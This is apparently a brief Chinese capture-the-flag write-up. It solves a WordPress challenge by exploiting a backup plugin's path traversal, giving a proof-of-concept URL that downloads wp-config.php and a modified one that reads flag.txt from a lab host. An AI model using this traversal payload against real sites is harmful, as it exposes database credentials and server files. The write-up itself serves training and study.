问题

2024-01-17T08:40:53.png

解题

访问web,发现存在插件
2024-01-17T08:42:02.png
搜索公共漏洞,得到poc:[站点]/[路径]/wp-admin/tools.php?page=backup_manager&download_backup_file=../wp-config.php

请输入图片描述
2024-01-17T08:43:39.png

修改poc,获取flag.txt:83.136.251.235:31002/wp-admin/tools.php?page=backup_manager&download_backup_file=../../../../flag.txt
2024-01-17T08:46:17.png
2024-01-17T08:46:30.png

总结

唯一的难度在于判断flag在几级目录下。

文章目录